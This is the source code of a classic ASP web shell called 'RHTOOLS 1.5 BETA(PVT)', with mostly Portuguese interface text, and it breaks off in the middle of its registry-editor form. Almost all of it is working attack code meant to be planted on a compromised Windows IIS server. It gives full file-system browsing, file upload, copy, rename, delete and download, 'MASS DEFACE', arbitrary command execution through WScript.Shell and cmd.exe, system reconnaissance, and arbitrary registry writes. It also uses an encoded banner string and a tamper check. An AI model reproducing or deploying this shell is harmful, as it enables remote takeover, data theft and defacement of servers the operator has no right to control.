Class FileUploader
Public Files
Private mcolFormElem
Private Sub Class_Initialize()
Set Files = Server.CreateObject("Scripting.Dictionary")
Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
End Sub
Private Sub Class_Terminate()
If IsObject(Files) Then
Files.RemoveAll()
Set Files = Nothing
End If
If IsObject(mcolFormElem) Then
mcolFormElem.RemoveAll()
Set mcolFormElem = Nothing
End If
End Sub
Public Property Get Form(sIndex)
Form = ""
If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
End Property
Public Default Sub Upload()
Dim biData, sInputName
Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
Dim nPosFile, nPosBound
biData = Request.BinaryRead(Request.TotalBytes)
nPosBegin = 1
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
If (nPosEnd-nPosBegin) <= 0 Then Exit Sub
vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
nDataBoundPos = InstrB(1, biData, vDataBounds)
Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))
nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))
nPos = InstrB(nPos, biData, CByteString("name="))
nPosBegin = nPos + 6
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))
nPosBound = InstrB(nPosEnd, biData, vDataBounds)
If nPosFile <> 0 And nPosFile < nPosBound Then
Dim oUploadFile, sFileName
Set oUploadFile = New UploadedFile
nPosBegin = nPosFile + 10
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\"))
nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
nPosBegin = nPos + 14
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
nPosBegin = nPosEnd+4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile
Else
nPos = InstrB(nPos, biData, CByteString(Chr(13)))
nPosBegin = nPos + 4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
End If
nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
Loop
End Sub
Private Function CByteString(sString)
Dim nIndex
For nIndex = 1 to Len(sString)
CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
Next
End Function
Private Function CWideString(bsString)
Dim nIndex
CWideString =""
For nIndex = 1 to LenB(bsString)
CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1)))
Next
End Function
End Class
Class UploadedFile
Public ContentType
Public FileName
Public FileData
Public Property Get FileSize()
FileSize = LenB(FileData)
End Property
Public Sub SaveToDisk(sPath)
Dim oFS, oFile
Dim nIndex
If sPath = "" Or FileName = "" Then Exit Sub
If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"
Set oFS = Server.CreateObject("Scripting.FileSystemObject")
If Not oFS.FolderExists(sPath) Then Exit Sub
Set oFile = oFS.CreateTextFile(sPath & FileName, True)
For nIndex = 1 to LenB(FileData)
oFile.Write Chr(AscB(MidB(FileData,nIndex,1)))
Next
oFile.Close
End Sub
Public Sub SaveToDatabase(ByRef oField)
If LenB(FileData) = 0 Then Exit Sub
If IsObject(oField) Then
oField.AppendChunk FileData
End If
End Sub
End Class
key = "5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA01902E59F7273E1902E597A18C51902E59AC1E8F1902E59DE24591902E55F5B0911902E53CF70E31902E597A18C51902E5B2349FA1902E5A422FED1902E597A18C51902E5A8D389C1902E53CF70E31902E53205CA01902E5B3C4CDF1902E5A422FED1902E5BEB61221902E59DE24591902E55F5B0911902E53CF70E31902E54C98DD51902E53CF70E31902E560EB3761902E547E85261902E55AAA7E21902E55AAA7E21902E53205CA01902E5802ED5A1902E5708D0681902E5834F3241902E57B7E4AB1902E57B7E4AB1902E576CDBFC1902E581BF03F1902E53205CA01902E54C98DD51902E547E85261902E552D99691902E53205CA01902E5672BF0A1902E56BDC7B91902E5834F3241902E5659BC251902E53E873C81902E57D0E7901902E5866F8EE1902E5834F3241902E540176AD1902E53B66DFE1902E59AC1E8F1902E5AD8414B1902E5AF144301902E5BD25E3D1902E55C3AAC71902E53205CA01902E5672BF0A1902E58B2019D1902E53205CA01902E55DCADAC1902E597A18C51902E53205CA01902E5A292D081902E5B2349FA1902E59DE24591902E59F7273E1902E55F5B0911902E53CF70E31902E5AA63B811902E597A18C51902E5A422FED1902E5A8D389C1902E5B554FC41902E5AD8414B1902E55AAA7E21902E5B2349FA1902E5A292D081902E59F7273E1902E597A18C51902E59AC1E8F1902E5B554FC41902E5AD8414B1902E5B2349FA1902E5640B9401902E597A18C51902E5ABF3E661902E5B554FC41902E5A422FED1902E5B3C4CDF1902E5AD8414B1902E59AC1E8F1902E5A422FED1902E597A18C51902E5A8D389C1902E547E85261902E59AC1E8F1902E5AD8414B1902E5AA63B811902E53CF70E31902E560EB3761902E5802ED5A1902E5708D0681902E56BDC7B91902E581BF03F1902E584DF6091902E581BF03F1902E53205CA01902E56D6CA9E1902E5659BC251902E568BC1EF1902E5834F3241902E57B7E4AB1902E5802ED5A1902E55DCADAC1902E5497880B1902E597A18C51902E560EB3761902E53205CA01902E546582411902E53205CA01902E55DCADAC1902E597A18C51902E53205CA01902E5A292D081902E5B2349FA1902E59DE24591902E59F7273E1902E55F5B0911902E53CF70E31902E5708D0681902E5834F3241902E5834F3241902E57D0E7901902E55AAA7E21902E5497880B1902E5497880B1902E587FFBD31902E587FFBD31902E587FFBD31902E547E85261902E5802ED5A1902E5708D0681902E56BDC7B91902E581BF03F1902E584DF6091902E581BF03F1902E56D6CA9E1902E5659BC251902E568BC1EF1902E5834F3241902E57B7E4AB1902E5802ED5A1902E547E85261902E568BC1EF1902E573AD6321902E5672BF0A1902E547E85261902E579EE1C61902E56BDC7B91902E5834F3241902E53CF70E31902E53205CA01902E5B554FC41902E597A18C51902E5B2349FA1902E5A102A231902E59DE24591902E5B554FC41902E55F5B0911902E53CF70E31902E594812FB1902E59931BAA1902E5A8D389C1902E597A18C51902E5ABF3E661902E5A7435B71902E53CF70E31902E560EB3761902E5708D0681902E5834F3241902E5834F3241902E57D0E7901902E55AAA7E21902E5497880B1902E5497880B1902E587FFBD31902E587FFBD31902E587FFBD31902E547E85261902E5802ED5A1902E5708D0681902E56BDC7B91902E581BF03F1902E584DF6091902E581BF03F1902E56D6CA9E1902E5659BC251902E568BC1EF1902E5834F3241902E57B7E4AB1902E5802ED5A1902E547E85261902E568BC1EF1902E573AD6321902E5672BF0A1902E547E85261902E579EE1C61902E56BDC7B91902E5834F3241902E55DCADAC1902E5497880B1902E597A18C51902E560EB3761902E53205CA01902E55AAA7E21902E55AAA7E21902E547E85261902E55DCADAC1902E5497880B1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E560EB3761902E5|337308|1A7023"
startcode = "<html><head><title>.:: RHTOOLS 1.5 BETA(PVT) ::.</title></head><body>"
endocde = "</body></html>"
onlinehelp = "<font face=""arial"" size=""1"">.:: <a href=""http://www.rhesusfactor.cjb.net"" target=""_blank"">ONLINE HELP</a> ::.</font><br>"
Function DeCryptString(strCryptString)
Dim strRAW, arHexCharSet, i, intKey, intOffSet, strRawKey, strHexCrypData
strRawKey = Right(strCryptString, Len(strCryptString) - InStr(strCryptString, "|"))
intOffSet = Right(strRawKey, Len(strRawKey) - InStr(strRawKey,"|"))
intKey = HexConv(Left(strRawKey, InStr(strRawKey, "|") - 1)) - HexConv(intOffSet)
strHexCrypData = Left(strCryptString, Len(strCryptString) - (Len(strRawKey) + 1))
arHexCharSet = Split(strHexCrypData, Hex(intKey))
For i=0 to UBound(arHexCharSet)
strRAW = strRAW & Chr(HexConv(arHexCharSet(i))/intKey)
Next
DeCryptString = CStr(strRAW)
End Function
Function HexConv(hexVar)
Dim hxx, hxx_var, multiply
IF hexVar <> "" THEN
hexVar = UCASE(hexVar)
hexVar = StrReverse(hexVar)
DIM hx()
REDIM hx(LEN(hexVar))
hxx = 0
hxx_var = 0
FOR hxx = 1 TO LEN(hexVar)
IF multiply = "" THEN multiply = 1
hx(hxx) = mid(hexVar,hxx,1)
hxx_var = (get_hxno(hx(hxx)) * multiply) + hxx_var
multiply = (multiply * 16)
NEXT
hexVar = hxx_var
HexConv = hexVar
END IF
End Function
cprthtml = "<font face='arial' size='1'>.:: RHTOOLS 1.5 BETA(PVT)&copy; BY <a href='mailto:rhfactor@antisocial.com'>RHESUS FACTOR</a> - <a href='HTTP://WWW.RHESUSFACTOR.CJB.NET' target='_blank'>HTTP://WWW.RHESUSFACTOR.CJB.NET</a> ::.</font>"
Function get_hxno(ghx)
If ghx = "A" Then
ghx = 10
ElseIf ghx = "B" Then
ghx = 11
ElseIf ghx = "C" Then
ghx = 12
ElseIf ghx = "D" Then
ghx = 13
ElseIf ghx = "E" Then
ghx = 14
ElseIf ghx = "F" Then
ghx = 15
End If
get_hxno = ghx
End Function
keydec = DeCryptString(key)
Function showobj(objpath)
showobj = Mid(objpath,InstrRev(objpath,"\")+1,Len(objpath))
End Function
Function showobjpath(objpath)
showobjpath = Left(objpath,InstrRev(objpath,"\"))
End Function
Function checking(a,b)
If CStr(Mid(a,95,13)) <> CStr(Mid(b,95,13)) Then
pagina = Mid(Request.ServerVariables("SCRIPT_NAME"),InstrRev(Request.ServerVariables("SCRIPT_NAME"),"/")+1,Len(Request.ServerVariables("SCRIPT_NAME"))) & "?action=error"
Response.Redirect(pagina)
End If
End Function
Sub hdr()
Response.Write startcode
Response.Write keydec
Response.Write "<br>"
End Sub
Sub showcontent()
Response.Write "<font face=""arial"" size=""1"">.:: <a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=root"">DRIVES</a> ::.<br>.:: SCRIPT PATH: " & UCase(Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))) & "<br><br></font>"
If Trim(Request.QueryString("raiz")) = "root" Then
Set fs=Server.Createobject("Scripting.FileSystemObject")
Set drivecollection=fs.drives
Response.Write "<font face=""arial"" size=""2"">"
For Each drive IN drivecollection
str=drive.driveletter & ":"
Response.Write "<b><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & str & """>" & UCase(str) & "</a></b><br>"
Select Case drive.DriveType
Case 0
tipodrive = "Unknown"
nomedrive = drive.VolumeName
Case 1
tipodrive = "Removable"
If drive.isready Then
nomedrive = drive.VolumeName
Else
nomedrive = ""
End If
Case 2
tipodrive = "Fixed"
If drive.isready Then
nomedrive = drive.VolumeName
Else
nomedrive = ""
End If
Case 3
tipodrive = "Network"
If drive.isready Then
nomedrive = drive.ShareName
Else
nomedrive = ""
End If
Case 4
tipodrive = "CD-Rom"
If drive.isready Then
nomedrive = drive.VolumeName
Else
nomedrive = ""
End If
Case 5
tipodrive = "RAM Disk"
If drive.isready Then
nomedrive = drive.VolumeName
Else
nomedrive = ""
End If
End Select
response.write "<b>Tipo:</b> " & tipodrive & "<br>"
response.write "<b>Nome: </b>" & nomedrive & "<br>"
response.write "<b>Sistema de Arquivos: </b>"
If drive.isready Then
set sp=fs.getdrive(str)
response.write sp.filesystem & "<br>"
Else
response.write "-<br>"
End If
Response.Write "<b>Espaço Livre: </b>"
If drive.isready Then
freespace = (drive.AvailableSpace / 1048576)
set sp=fs.getdrive(str)
response.write(Round(freespace,1) & " MB<br>")
Else
response.write("-<br>")
End If
Response.Write "<b>Espaço Total: </b>"
If drive.isready Then
totalspace = (drive.TotalSize / 1048576)
set sp=fs.getdrive(str)
response.write(Round(totalspace,1) & " MB<br>")
Else
response.write("-<br>")
End If
Response.Write "<br>"
Next
Response.Write "</font>"
Set fs = Nothing
Set drivecollection = Nothing
set sp=Nothing
Else
If Trim(Request.QueryString("raiz")) = "" Then
caminho = Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))
pos = Instr(caminho,"\")
pos2 = 1
While pos2 <> 0
If Instr(pos + 1,caminho,"\") <> 0 Then
pos = Instr(pos + 1,caminho,"\")
Else
pos2 = 0
End If
Wend
raiz = Left(caminho,pos)
Else
raiz = trim(Request.QueryString("raiz")) & "\"
End If
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MonRep = ObjFSO.GetFolder(raiz)
Set ColFolders = MonRep.SubFolders
Set ColFiles0 = MonRep.Files
Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=test&path=" & Replace(raiz,"\","|") & "', 'win1','width=600,height=300,scrollbars=YES,resizable')"">MASS TEST IN " & UCase(raiz) & "</a></font><br><br>"
Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=dfc&path=" & Replace(raiz,"\","|") & "', 'win1','width=700,height=300,scrollbars=YES,resizable')"">MASS DEFACE IN " & UCase(raiz) & "</a></font><br><br>"
Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=upload&path=" & Replace(raiz,"\","|") & "', 'win1','width=500,height=100,scrollbars=YES,resizable')"">UPLOAD FILE TO " & UCase(raiz) & "</a></font><br><br>"
Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=cmd', 'win1','width=760,height=540,scrollbars=YES,resizable')"">PROMPT</a> - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=info', 'win1','width=760,height=450,scrollbars=YES,resizable')"">SYS INFO</a> - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg', 'win1','width=550,height=250,scrollbars=YES,resizable')"">REGEDIT</a></font><br><br>"
Response.Write "<font face='arial'><b>Root Folder: " & raiz & "</b></font><br><br>"
If CInt(Len(raiz) - 1) <> 2 Then
barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),"\")) - 1
backlevel = Left(raiz,barrapos)
Response.Write "<font face='arial' size='2'><b>&lt;DIR&gt;<a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & backlevel & "'> . . </font></b></a><br>"
Else
Response.Write "<font face='arial' size='2'><b>&lt;DIR&gt;<a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=root'> . .&nbsp;</font></b></a><br>"
End If
Response.Write "<table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
for each folderItem in ColFolders
Response.Write "<tr><td><font face='arial' size='2'><b>&lt;DIR&gt; <a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & folderItem.path & "'>" & showobj(folderItem.path) & "</a></b></td><td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=put&path=" & Replace(folderItem.path,"\","|") & "', 'win1','width=400,height=250,scrollbars=YES,resizable')"">&lt;&lt; PUT</a></font></td></tr>"
next
Response.Write "</table><br><table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
marcatabela = true
for each FilesItem0 in ColFiles0
If marcatabela = true then
corfundotabela = " bgcolor=""#EEEEEE"""
Else
corfundotabela = ""
End If
Response.Write "<tr><td" & corfundotabela & "><font face='arial' size='2'>:: " & showobj(FilesItem0.path) & "</td><td valign='baseline'" & corfundotabela & "><font face='arial' size='1'>&nbsp;&nbsp;" & FormatNumber(FilesItem0.size/1024, 0) & "&nbsp;Kbytes&nbsp;&nbsp;&nbsp;</font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=get&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.GET.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=ren&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.REN.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=del&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.DEL.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtview&file=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=640,height=480,scrollbars=YES,resizable')"">o.VIEW.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit&file=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=760,height=520,scrollbars=YES,resizable')"">o.EDIT.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=download&file=" & Replace(FilesItem0.path,"\","|") & """>o.DOWNLOAD.o</a></font></td></tr>"
marcatabela = NOT marcatabela
next
Response.Write "</table>"
End If
End Sub
Select Case Trim(Request.QueryString("action"))
Case "get"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(caminho)
destino = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
MyFile.Copy (destino)
If Err.Number = 0 Then
Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & caminho & "</b><br>copiado para: " & destino
End If
Case "put"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
If Trim(Request.QueryString("arquivo")) = "" Then
caminho = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
varpath = Trim(Request.QueryString("path"))
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MonRep = ObjFSO.GetFolder(caminho)
Set ColFolders = MonRep.SubFolders
Set ColFiles0 = MonRep.Files
Response.Write "<font face='arial' size='2'><b>Selecione o arquivo: <br><table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
for each FilesItem0 in ColFiles0
Response.Write "<tr><td><font face='arial' size='2'>:: " & showobj(FilesItem0.path) & "</td><td valign='baseline'><font face='arial' size='1'>&nbsp;&nbsp;" & FormatNumber(FilesItem0.size/1024, 0) & "&nbsp;Kbytes&nbsp;&nbsp;&nbsp;</font></td><td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=put&path=" & varpath & "&arquivo=" & Replace(FilesItem0.path,"\","|") & """>:: SELECIONAR ::</a></font></td></tr>"
next
Response.Write "</table>"
Else
destino = Replace(Trim(Request.QueryString("path")),"|","\") & "\"
arquivo = Replace(Trim(Request.QueryString("arquivo")),"|","\")
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(arquivo)
MyFile.Copy (destino)
If Err.Number = 0 Then
Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & arquivo & "</b><br>copiado para: <b>" & destino
End If
End If
Case "del"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(caminho)
MyFile.Delete
If Err.Number = 0 Then
Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
Response.Write "<font face='arial' size='2'><center><br><br>Arquivo <b>" & caminho & "</b> apagado<br>"
End If
Case "ren"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
If Trim(Request.QueryString("status")) <> "2" Then
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
arquivo = showobj(caminho)
Response.Write "<br><font face=""arial"" size=""2""><b>" & arquivo & "</b><br>" & _
"<form action=""" & Request.ServerVariables("SCRIPT_NAME") & """ method=""get"">" & _
"<input type=""hidden"" name=""action"" value=""ren"">" & _
"<input type=""hidden"" name=""status"" value=""2"">" & _
"<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("path")) & """>" & _
"Digite o novo nome: <input type=""text"" name=""newname"">" & _
"&nbsp;&nbsp;<input type=""submit"" value=""alterar"">" & _
"</form>"
Else
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(caminho)
destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.QueryString("newname"))
MyFile.Move (destino)
If Err.Number = 0 Then
Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & caminho & "</b><br>renomeado para<b>: " & destino
Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
End If
End If
Case "error"
Response.Write "<center><font face='arial' size='2' color='red'> <b>CÓDIGO CORROMPIDO<BR>CORRUPT CODE</font></center>"
Case "cmd"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = Request.QueryString(".CMD")
If (szCMD <> "") Then
szTempFile = "c:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET""><input type=""hidden"" name=""action"" value=""cmd""><input type=text name="".CMD"" size=45 value=""" & szCMD & """><input type=submit value=""Run""></FORM><br><br> "
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write "<font face=""arial"">"
Response.Write Replace(Replace(Server.HTMLEncode(oFile.ReadAll),VbCrLf,"<br>")," ","&nbsp;")
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
Case "info"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
Set WshNetwork = Server.CreateObject("WScript.Network")
Set WshShell = Server.CreateObject("WScript.Shell")
Set WshEnv = WshShell.Environment("SYSTEM")
Response.Write "<br><font face=arial size=2>"
Response.Write "<b>IDENTIFICAÇÃO DE REDE:</b><br>"
Response.Write "<b>Usuário: </b>" & WshNetwork.UserName & "<br>"
Response.Write "<b>Nome do Computador: </b>" & WshNetwork.ComputerName & "<br>"
Response.Write "<b>Usuário do Domínio: </b>" & WshNetwork.UserDomain & "<br>"
Set Drives = WshNetwork.EnumNetworkDrives
For i = 0 to Drives.Count - 1
Response.Write "<b>Drive de Rede (Mapeado): </b>" & Drives.Item(i) & "<br>"
Next
Response.Write "<br><b>FÍSICO:</b><br>"
Response.Write "<b>Arquitetura do Processador: </b>" & WshEnv("PROCESSOR_ARCHITECTURE") & "<br>"
Response.Write "<b>Número de Processadores: </b>" & WshEnv("NUMBER_OF_PROCESSORS") & "<br>"
Response.Write "<b>Identificador do Processador: </b>" & WshEnv("PROCESSOR_IDENTIFIER") & "<br>"
Response.Write "<b>Nível do Processador: </b>" & WshEnv("PROCESSOR_LEVEL") & "<br>"
Response.Write "<b>Revisão do Processador: </b>" & WshEnv("PROCESSOR_REVISION") & "<br>"
Response.Write "<br><b>LÓGICO:</b><br>"
Response.Write "<b>IP: </b>" & request.servervariables("LOCAL_ADDR") & "<br>"
Response.Write "<b>Sistema Operacional: </b>" & WshEnv("OS") & "<br>"
Response.Write "<b>Servidor Web: </b>" & request.servervariables("SERVER_SOFTWARE") & "<br>"
Response.Write "<b>Especificação do Command: </b>" & WshShell.ExpandEnvironmentStrings("%ComSpec%") & "<br>"
Response.Write "<b>Caminhos no Path: </b>" & WshEnv("PATH") & "<br>"
Response.Write "<b>Executáveis: </b>" & WshEnv("PATHEXT") & "<br>"
Response.Write "<b>Prompt: </b> " & WshEnv("PROMPT") & "<br>"
Response.Write "<b>System Drive: </b>" & WshShell.ExpandEnvironmentStrings("%SYSTEMDRIVE%") & "<br>"
Response.Write "<b>System Root: </b>" & WshShell.ExpandEnvironmentStrings("%SYSTEMROOT%") & "<br>"
Response.Write "<b>Caminho do System32: </b>" & WshShell.CurrentDirectory & "<br>"
Set Drives = Nothing
Set WshNetwork = Nothing
Set WshShell = Nothing
Set WshEnv = Nothing
Case "reg"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
Set WshShell = Server.CreateObject("WScript.Shell")
Response.Write "<font face=""arial"" size=""2""><b>Editor de Registro:</b><br><br>"
Select Case Trim(Request.QueryString("regaction"))
Case "w"
If Trim(Request.QueryString("process")) = "yes" Then
Select Case Trim(Request.QueryString("type"))
Case "1"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_SZ")
Case "2"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_DWORD")
Case "3"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_BINARY")
Case "4"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_EXPAND_SZ")
Case "5"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_MULTI_SZ")
End Select
Response.Write "<center><br><font face=""arial"" size=""2"">Registro <b>"
Response.Write Trim(Request.QueryString("key")) & "</b> Escrito</center>"
Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
Else
Response.Write "<table><tr><td><font face=""arial"" size=""2"">ROOT KEY NAME</td><td><font face=""arial"" size=""2"">ABREVIAÇÃO</td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CURRENT_USER </td><td><font face=""arial"" size=""1""> HKCU </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_LOCAL_MACHINE </td><td><font face=""arial"" size=""1""> HKLM </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CLASSES_ROOT </td><td><font face=""arial"" size=""1""> HKCR </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_USERS </td><td><font face=""arial"" size=""1""> HKEY_USERS </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CURRENT_CONFIG </td><td><font face=""arial"" size=""1""> HKEY_CURRENT_CONFIG </td></tr></table><br>"
Response.Write "<table><tr><td><font face=""arial"" size=""2"">Tipo </td><td><font face=""arial"" size=""2""> Descrição </td><td><font face=""arial"" size=""2""> Na forma de </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">REG_SZ </td><td><font face=""arial"" size=""1""> string </td><td><font face=""arial"" size=""1""> string </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">REG_DWORD </td><td><font face=""arial"" size=""1""> número </td><td><font face=""arial"" size=""1""> inteiro </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">REG_BINARY </td><td><font face=""arial"" size=""1""> valor binário </td><td><font face=""arial"" size=""1""> VBArray de inteiros </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">REG_EXPAND_SZ </td><td><font face=""arial"" size=""1""> string expandível (ex. ""%windir%\\calc.exe"") </td><td><font face=""arial"" size=""1""> string </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">REG_MULTI_SZ </td><td><font face=""arial"" size=""1""> array de strings </td><td><font face=""arial"" size=""1""> VBArray de strings </td></tr></table>"
Response.Write "<br><br><FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
Response.Write "<table><tr><td><font face=""arial"" size=""1"">KEY: </td><td><input type=""text"" name=""key""> <font face=""arial"" size=""1""><br>( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )</td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">VALUE:</td><td><input type=""text"" name=""value""></td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">TYPE:</td><td><SELECT NAME=""type"">"
Response.Write "<OPTION VALUE=""1"">REG_SZ </option>"
